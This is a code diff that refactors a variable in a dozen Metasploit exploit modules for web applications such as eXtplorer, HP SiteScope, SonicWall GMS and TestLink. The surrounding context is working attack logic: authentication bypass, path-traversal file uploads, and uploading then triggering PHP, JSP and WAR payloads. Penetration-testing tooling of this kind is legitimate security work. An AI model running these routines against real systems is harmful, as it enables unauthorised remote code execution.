       return
     end
 
@@ -103,8 +103,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     uri = normalize_uri(target_uri.path)
     uri << '/' if uri[-1,1] != '/'
     base = File.dirname("#{uri}.")

--- a/modules/exploits/multi/http/cuteflow_upload_exec.rb
+++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb
@@ -99,20 +99,19 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     base  = normalize_uri(target_uri.path)
     base << '/' if base[-1, 1] != '/'
-    @peer = "#{rhost}:#{rport}"
 
     # upload PHP payload to upload/___1/
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
     fname = rand_text_alphanumeric(rand(10)+6) + '.php'
     php   = %Q|<?php #{payload.encoded} ?>|
     res   = upload(base, fname, php)
     if res.nil?
-      print_error("#{@peer} - Uploading PHP payload failed")
+      print_error("#{peer} - Uploading PHP payload failed")
       return
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Retrieving file: #{fname}")
+    print_status("#{peer} - Retrieving file: #{fname}")
     send_request_raw({
       'method' => 'GET',
       'uri'    => normalize_uri(base, "upload/___1/#{fname}")

--- a/modules/exploits/multi/http/extplorer_upload_exec.rb
+++ b/modules/exploits/multi/http/extplorer_upload_exec.rb
@@ -135,22 +135,22 @@ class Metasploit3 < Msf::Exploit::Remote
 
     base  = target_uri.path
     base << '/' if base[-1, 1] != '/'
-    @peer = "#{rhost}:#{rport}"
+
     @fname= rand_text_alphanumeric(rand(10)+6) + '.php'
     user  = datastore['USERNAME']
     datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";"
 
     # bypass auth
-    print_status("#{@peer} - Authenticating as user (#{user})")
+    print_status("#{peer} - Authenticating as user (#{user})")
     res   = auth_bypass(base, user)
     if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/
-      print_status("#{@peer} - Authenticated successfully")
+      print_status("#{peer} - Authenticated successfully")
     else
-      fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
     end
 
     # search for writable directories
-    print_status("#{@peer} - Retrieving writable subdirectories")
+    print_status("#{peer} - Retrieving writable subdirectories")
     begin
       res = send_request_cgi({
         'method'  => 'POST',
@@ -159,32 +159,32 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'    => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root",
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
     if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/
       dir = "#{base}#{$1}"
-      print_status("#{@peer} - Successfully retrieved writable subdirectory (#{$1})")
+      print_status("#{peer} - Successfully retrieved writable subdirectory (#{$1})")
     else
       dir = "#{base}"
-      print_error("#{@peer} - Could not find a writable subdirectory.")
+      print_error("#{peer} - Could not find a writable subdirectory.")
     end
 
     # upload PHP payload
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}")
     php = %Q|<?php #{payload.encoded} ?>|
     begin
       res = upload(base, dir, @fname, php)
       if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/
-        print_good("#{@peer} - File uploaded successfully")
+        print_good("#{peer} - File uploaded successfully")
       else
-        fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
+        fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
     # search directories in the web root for the file
-    print_status("#{@peer} - Searching directories for file (#{@fname})")
+    print_status("#{peer} - Searching directories for file (#{@fname})")
     begin
       res   = send_request_cgi({
         'method' => 'POST',
@@ -193,27 +193,27 @@ class Metasploit3 < Msf::Exploit::Remote
         'cookie' => datastore['COOKIE'],
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
     if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/
       dir = $1.gsub('\\','')
-      print_good("#{@peer} - Successfully found file")
+      print_good("#{peer} - Successfully found file")
     else
-      print_error("#{@peer} - Failed to find file")
+      print_error("#{peer} - Failed to find file")
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (/#{dir}/#{@fname})")
+    print_status("#{peer} - Executing payload (/#{dir}/#{@fname})")
     begin
       send_request_cgi({
         'method' => 'GET',
         'uri'    => "/#{dir}/#{@fname}"
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
     if res and res.code != 200
-      print_error("#{@peer} - Executing payload failed")
+      print_error("#{peer} - Executing payload failed")
     end
   end
 end

--- a/modules/exploits/multi/http/glossword_upload_exec.rb
+++ b/modules/exploits/multi/http/glossword_upload_exec.rb
@@ -124,38 +124,37 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
 
     base  = target_uri.path
-    @peer = "#{rhost}:#{rport}"
     @fname= rand_text_alphanumeric(rand(10)+6) + '.php'
     user  = datastore['USERNAME']
     pass  = datastore['PASSWORD']
 
     # login; get session id and token
-    print_status("#{@peer} - Authenticating as user '#{user}'")
+    print_status("#{peer} - Authenticating as user '#{user}'")
     res = login(base, user, pass)
     if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
       token = "#{$1}"
       sid   = "#{$2}"
-      print_good("#{@peer} - Authenticated successfully")
+      print_good("#{peer} - Authenticated successfully")
     else
-      fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
     end
 
     # upload PHP payload
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
     php = %Q|<?php #{payload.encoded} ?>|
     begin
       res = upload(base, sid, @fname, php)
       if res and res.code == 301 and res['location'] =~ /Setting saved/
-        print_good("#{@peer} - File uploaded successfully")
+        print_good("#{peer} - File uploaded successfully")
       else
-        fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
+        fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
     # retrieve PHP file path
-    print_status("#{@peer} - Locating PHP payload file")
+    print_status("#{peer} - Locating PHP payload file")
     begin
       res   = send_request_cgi({
         'method' => 'GET',
@@ -163,28 +162,28 @@ class Metasploit3 < Msf::Exploit::Remote
         'cookie' => "sid#{token}=#{sid}"
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
     if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/
       shell_uri = "#{$1}"
       @fname    = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)')
-      print_good("#{@peer} - Found payload file path (#{shell_uri})")
+      print_good("#{peer} - Found payload file path (#{shell_uri})")
     else
-      fail_with(Failure::UnexpectedReply, "#{@peer} - Failed to find PHP payload file path")
+      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path")
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (#{shell_uri})")
+    print_status("#{peer} - Executing payload (#{shell_uri})")
     begin
       send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(base, shell_uri),
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
     if !res or res.code != 200
-      fail_with(Failure::UnexpectedReply, "#{@peer} - Executing payload failed")
+      fail_with(Failure::UnexpectedReply, "#{peer} - Executing payload failed")
     end
   end
 end

--- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
+++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
@@ -84,20 +84,19 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
 
     # Create user with empty credentials
-    print_status("#{@peer} - Creating user with empty credentials")
+    print_status("#{peer} - Creating user with empty credentials")
 
     if create_user.nil?
-      print_error("#{@peer} - Failed to create user")
+      print_error("#{peer} - Failed to create user")
       return
     end
 
     # Generate an initial JSESSIONID
-    print_status("#{@peer} - Retrieving an initial JSESSIONID")
+    print_status("#{peer} - Retrieving an initial JSESSIONID")
     res = send_request_cgi(
       'uri'    => normalize_uri(@uri, 'servlet/Main'),
       'method' => 'POST'
@@ -106,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote
     if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
       session_id = $1
     else
-      print_error("#{@peer} - Retrieve of initial JSESSIONID failed")
+      print_error("#{peer} - Retrieve of initial JSESSIONID failed")
       return
     end
 
     # Authenticate
     login_data = "j_username=&j_password="
 
-    print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
+    print_status("#{peer} - Authenticating on HP SiteScope Configuration")
     res = send_request_cgi(
       {
         'uri'    => normalize_uri(@uri, 'j_security_check'),
@@ -130,12 +129,12 @@ class Metasploit3 < Msf::Exploit::Remote
       session_id = $1
       redirect =  URI(res.headers['Location']).path
     else
-      print_error("#{@peer} - Authentication on SiteScope failed")
+      print_error("#{peer} - Authentication on SiteScope failed")
       return
     end
 
     # Follow redirection to complete authentication process
-    print_status("#{@peer} - Following redirection to finish authentication")
+    print_status("#{peer} - Following redirection to finish authentication")
     res = send_request_cgi(
       {
         'uri' => redirect,
@@ -147,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
       })
 
     if not res or res.code != 200
-      print_error("#{@peer} - Authentication on SiteScope failed")
+      print_error("#{peer} - Authentication on SiteScope failed")
       return
     end
 
@@ -235,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
       traversal = "..\\..\\..\\..\\..\\..\\"
     end
 
-    print_status("#{@peer} - Uploading the payload")
+    print_status("#{peer} - Uploading the payload")
     res = send_request_cgi(
       {
         'uri'    => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true",
@@ -250,16 +249,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
       path = $1
-      print_good("#{@peer} - Payload successfully uploaded to #{path}")
+      print_good("#{peer} - Payload successfully uploaded to #{path}")
     else
-      print_error("#{@peer} - Error uploading the Payload")
+      print_error("#{peer} - Error uploading the Payload")
       return
     end
 
     post_data = Rex::MIME::Message.new
     post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"")
 
-    print_status("#{@peer} - Uploading the JSP")
+    print_status("#{peer} - Uploading the JSP")
     res = send_request_cgi(
       {
         'uri'    => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
@@ -274,9 +273,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
       path = $1
-      print_good("#{@peer} - JSP successfully uploaded to #{path}")
+      print_good("#{peer} - JSP successfully uploaded to #{path}")
     else
-      print_error("#{@peer} - Error uploading the JSP")
+      print_error("#{peer} - Error uploading the JSP")
       return
     end
 

--- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb
+++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb
@@ -101,32 +101,31 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
 
     base   = target_uri.path
-    @peer  = "#{rhost}:#{rport}"
     @fname = rand_text_numeric(7)
 
     # upload PHP payload to userpictures/[fname].php
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
     php    = %Q|<?php #{payload.encoded} ?>|
     begin
       res = upload(base, php)
       if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/
-        print_good("#{@peer} - File uploaded successfully")
+        print_good("#{peer} - File uploaded successfully")
       else
-        fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
+        fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)")
+    print_status("#{peer} - Executing payload (userpictures/#{@fname}.php)")
     begin
       res = send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(base, 'userpictures', "#{@fname}.php")
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
   end

--- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb
+++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb
@@ -72,8 +72,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     #
     # Init target path
     #
@@ -89,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #
     # Upload payload
     #
-    print_status("#{@peer} - Uploading payload")
+    print_status("#{peer} - Uploading payload")
     res = send_request_cgi({
       'uri' => normalize_uri(base, "/includes/savepage.php"),
       'vars_get' => {
@@ -99,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res
-      print_error("#{@peer} - No response from server, will not continue.")
+      print_error("#{peer} - No response from server, will not continue.")
       return
     end
 
     #
     # Run payload
     #
-    print_status("#{@peer} - Requesting '#{php_fname}'")
+    print_status("#{peer} - Requesting '#{php_fname}'")
     send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })
 
     handler

--- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb
+++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb
@@ -69,9 +69,8 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def check
-    @peer = "#{rhost}:#{rport}"
     fingerprint = rand_text_alpha(5)
-    print_status("#{@peer} - Sending check...")
+    print_status("#{peer} - Sending check...")
     begin
       res = http_send_raw(fingerprint)
     rescue Rex::ConnectionError
@@ -91,8 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-    print_status("#{@peer} - Sending payload...")
+    print_status("#{peer} - Sending payload...")
     http_send_cmd(payload.encoded)
   end
 

--- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb
+++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # If we don't get a cookie, bail!
     if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/
       cookie = $1
-      vprint_status("#{@peer} - Found cookie: #{cookie}")
+      vprint_status("#{peer} - Found cookie: #{cookie}")
     else
       return nil
     end
@@ -189,56 +189,54 @@ class Metasploit3 < Msf::Exploit::Remote
     base = normalize_uri(target_uri.path)
     base << '/' if base[-1, 1] != '/'
 
-    @peer = "#{rhost}:#{rport}"
-
     # Login
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
     cookie = login(base, username, password)
     if cookie.nil?
-      print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
+      print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
       return
     end
 
-    print_status("#{@peer} - Login successful with #{username}:#{password}")
+    print_status("#{peer} - Login successful with #{username}:#{password}")
 
     # Take a snapshot of the uploads directory
     # Viewing this doesn't actually require the user to login first,
     # but we supply the cookie anyway to act more like a real user.
-    print_status("#{@peer} - Enumerating all the uploads...")
+    print_status("#{peer} - Enumerating all the uploads...")
     before = peek_uploads(base, cookie)
     if before.nil?
-      print_error("#{@peer} - Unable to enumerate original uploads")
+      print_error("#{peer} - Unable to enumerate original uploads")
       return
     end
 
     # Upload our PHP shell
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
     fname = rand_text_alpha(rand(10)+6) + '.php'
     desc  = rand_text_alpha(rand(10)+5)
     php   = %Q|<?php #{payload.encoded} ?>|
     res = upload(base, cookie, fname, php, desc)
     if res.nil? or res.body !~ /The file was successfuly uploaded/
-      print_error("#{@peer} - Failed to upload our file")
+      print_error("#{peer} - Failed to upload our file")
       return
     end
 
     # Now that we've uploaded our shell, let's take another snapshot
     # of the uploads directory.
-    print_status("#{@peer} - Enumerating new uploads...")
+    print_status("#{peer} - Enumerating new uploads...")
     after = peek_uploads(base, cookie)
     if after.nil?
-      print_error("#{@peer} - Unable to enumerate latest uploads")
+      print_error("#{peer} - Unable to enumerate latest uploads")
       return
     end
 
     # Find the filename of our uploaded shell
     files = get_my_file(before.body, after.body)
     if files.empty?
-      print_error("#{@peer} - No new file(s) found. The upload probably failed.")
+      print_error("#{peer} - No new file(s) found. The upload probably failed.")
       return
     else
-      vprint_status("#{@peer} - Found these new files: #{files.inspect}")
+      vprint_status("#{peer} - Found these new files: #{files.inspect}")
     end
 
     # There might be more than 1 new file, at least execute the first 10

--- a/modules/exploits/multi/http/qdpm_upload_exec.rb
+++ b/modules/exploits/multi/http/qdpm_upload_exec.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     @clean_files.each do |f|
-      print_warning("#{@peer} - Removing: #{f}")
+      print_warning("#{peer} - Removing: #{f}")
       begin
         if cli.type == 'meterpreter'
           cli.fs.file.rm(f)
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
           cli.shell_command_token("rm #{f}")
         end
       rescue ::Exception => e
-        print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
+        print_error("#{peer} - Unable to remove #{f}: #{e.message}")
       end
     end
   end
@@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
     cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]
 
     # Get user data
-    vprint_status("#{@peer} - Enumerating user data")
+    vprint_status("#{peer} - Enumerating user data")
     res = send_request_raw({
       'uri' => "#{base}/index.php/home/myAccount",
       'cookie' => cookie
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     return {} if not res
     if res.code == 404
-      print_error("#{@peer} - #{username} does not actually have a 'myAccount' page")
+      print_error("#{peer} - #{username} does not actually have a 'myAccount' page")
       return {}
     end
 
@@ -208,35 +208,33 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res
-      print_error("#{@peer} - Unable to request the file")
+      print_error("#{peer} - Unable to request the file")
       return
     end
 
     fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
     if fname.empty?
-      print_error("#{@peer} - Unable to extract the real filename")
+      print_error("#{peer} - Unable to extract the real filename")
       return
     end
 
     # Now that we have the filename, request it
-    print_status("#{@peer} - Uploaded file was renmaed as '#{fname}'")
+    print_status("#{peer} - Uploaded file was renmaed as '#{fname}'")
     send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})
     handler
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     uri = normalize_uri(target_uri.path)
     uri << '/' if uri[-1,1] != '/'
     base = File.dirname("#{uri}.")
 
     user = datastore['USERNAME']
     pass = datastore['PASSWORD']
-    print_status("#{@peer} - Attempt to login with '#{user}:#{pass}'")
+    print_status("#{peer} - Attempt to login with '#{user}:#{pass}'")
     opts = login(base, user, pass)
     if opts.empty?
-      print_error("#{@peer} - Login unsuccessful")
+      print_error("#{peer} - Login unsuccessful")
       return
     end
 
@@ -253,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote
       p = get_write_exec_payload("/tmp/#{bin_name}", bin)
     end
 
-    print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
+    print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
     opts = opts.merge({
       'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
       'email'    => user,
@@ -262,11 +260,11 @@ class Metasploit3 < Msf::Exploit::Remote
     })
     uploader = upload_php(base, opts)
     if not uploader
-      print_error("#{@peer} - Unable to upload")
+      print_error("#{peer} - Unable to upload")
       return
     end
 
-    print_status("#{@peer} - Executing '#{php_fname}'")
+    print_status("#{peer} - Executing '#{php_fname}'")
     exec_php(base, opts)
   end
 end

--- a/modules/exploits/multi/http/sflog_upload_exec.rb
+++ b/modules/exploits/multi/http/sflog_upload_exec.rb
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
     post_data = data.to_s
     post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
-    print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
+    print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
     res = send_request_cgi({
       'method' => 'POST',
       'uri'    => "#{base}/admin/manage.php",
@@ -122,15 +122,15 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res
-      print_error("#{@peer} - No response from host")
+      print_error("#{peer} - No response from host")
       return
     end
 
     target_path = "#{base}/blogs/download/uploads/#{php_fname}"
-    print_status("#{@peer} - Requesting '#{target_path}'...")
+    print_status("#{peer} - Requesting '#{target_path}'...")
     res = send_request_raw({'uri'=>target_path})
     if res and res.code == 404
-      print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
+      print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
       return
     end
 
@@ -139,17 +139,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     uri = normalize_uri(target_uri.path)
     uri << '/' if uri[-1,1] != '/'
     base = File.dirname("#{uri}.")
 
-    print_status("#{@peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
+    print_status("#{peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
     cookie = do_login(base)
 
     if cookie.empty?
-      print_error("#{@peer} - Unable to login")
+      print_error("#{peer} - Unable to login")
       return
     end
 

--- a/modules/exploits/multi/http/sonicwall_gms_upload.rb
+++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb
@@ -159,16 +159,14 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     # Get Tomcat installation path
-    print_status("#{@peer} - Retrieving Tomcat installation path...")
+    print_status("#{peer} - Retrieving Tomcat installation path...")
 
     if install_path.nil?
-      fail_with(Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
+      fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path")
     end
 
-    print_good("#{@peer} - Tomcat installed on #{install_path}")
+    print_good("#{peer} - Tomcat installed on #{install_path}")
 
     if target['Platform'] == "java"
       exploit_java
@@ -178,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit_java
-    print_status("#{@peer} - Uploading WAR file")
+    print_status("#{peer} - Uploading WAR file")
     app_base = rand_text_alphanumeric(4+rand(32-4))
 
     war = payload.encoded_war({ :app_name => app_base }).to_s
@@ -195,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
       select(nil, nil, nil, 2)
 
       # Now make a request to trigger the newly deployed war
-      print_status("#{@peer} - Attempting to launch payload in deployed WAR...")
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
       res = send_request_cgi(
         {
           'uri'    => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
@@ -209,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit_native
-    print_status("#{@peer} - Uploading executable file")
+    print_status("#{peer} - Uploading executable file")
     exe = payload.encoded_exe
     exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))
     if target['Platform'] == "win"

--- a/modules/exploits/multi/http/testlink_upload_exec.rb
+++ b/modules/exploits/multi/http/testlink_upload_exec.rb
@@ -152,34 +152,34 @@ class Metasploit3 < Msf::Exploit::Remote
 
     base  = normalize_uri(target_uri.path)
     base << '/' if base[-1, 1] != '/'
-    @peer = "#{rhost}:#{rport}"
+
     datastore['COOKIE'] = "PHPSESSID="+rand_text_alpha_lower(26)+";"
 
     # register an account
     user  = rand_text_alphanumeric(rand(10)+6)
-    print_status("#{@peer} - Registering user (#{user})")
+    print_status("#{peer} - Registering user (#{user})")
     res   = register(base, user, user)
     if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
-      print_status("#{@peer} - Registered successfully")
+      print_status("#{peer} - Registered successfully")
     else
-      print_error("#{@peer} - Registration failed")
+      print_error("#{peer} - Registration failed")
       return
     end
 
     # login
-    print_status("#{@peer} - Authenticating user (#{user})")
+    print_status("#{peer} - Authenticating user (#{user})")
     res   = login(base, user, user)
     if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
-      print_status("#{@peer} - Authenticated successfully")
+      print_status("#{peer} - Authenticated successfully")
     else
-      print_error("#{@peer} - Authentication failed")
+      print_error("#{peer} - Authentication failed")
       return
     end
 
     # set id and table name
     id    = rand(1000)+1
     table = 'nodes_hierarchy'
-    print_status("#{@peer} - Setting id (#{id}) and table name (#{table})")
+    print_status("#{peer} - Setting id (#{id}) and table name (#{table})")
     begin
       res = send_request_cgi({
         'method'  => 'GET',
@@ -187,35 +187,35 @@ class Metasploit3 < Msf::Exploit::Remote
         'cookie' => datastore['COOKIE'],
       })
       if res and res.code == 200
-        print_status("#{@peer} - Setting id and table name successfully")
+        print_status("#{peer} - Setting id and table name successfully")
       else
-        print_error("#{@peer} - Setting id and table name failed")
+        print_error("#{peer} - Setting id and table name failed")
         return
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
       return
     end
 
     # upload PHP payload to ./upload_area/nodes_hierarchy/[id]/
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
     fname  = rand_text_alphanumeric(rand(10)+6) + '.php'
     php    = %Q|<?php #{payload.encoded} ?>|
     begin
       res    = upload(base, fname, php)
       if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/
-        print_good("#{@peer} - File uploaded successfully")
+        print_good("#{peer} - File uploaded successfully")
       else
-        print_error("#{@peer} - Uploading PHP payload failed")
+        print_error("#{peer} - Uploading PHP payload failed")
         return
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
       return
     end
 
     # attempt to retrieve real file name from directory index
-    print_status("#{@peer} - Retrieving real file name from directory index.")
+    print_status("#{peer} - Retrieving real file name from directory index.")
     begin
       res = send_request_cgi({
         'method' => 'GET',
@@ -223,19 +223,19 @@ class Metasploit3 < Msf::Exploit::Remote
       })
       if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
         @token = $1
-        print_good("#{@peer} - Successfully retrieved file name (#{@token})")
+        print_good("#{peer} - Successfully retrieved file name (#{@token})")
       else
-        print_error("#{@peer} - Could not retrieve file name from directory index.")
+        print_error("#{peer} - Could not retrieve file name from directory index.")
       end
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
       return
     end
 
     # attempt to retrieve real file name from the database
     if @token.nil?
-      print_status("#{@peer} - Retrieving real file name from the database.")
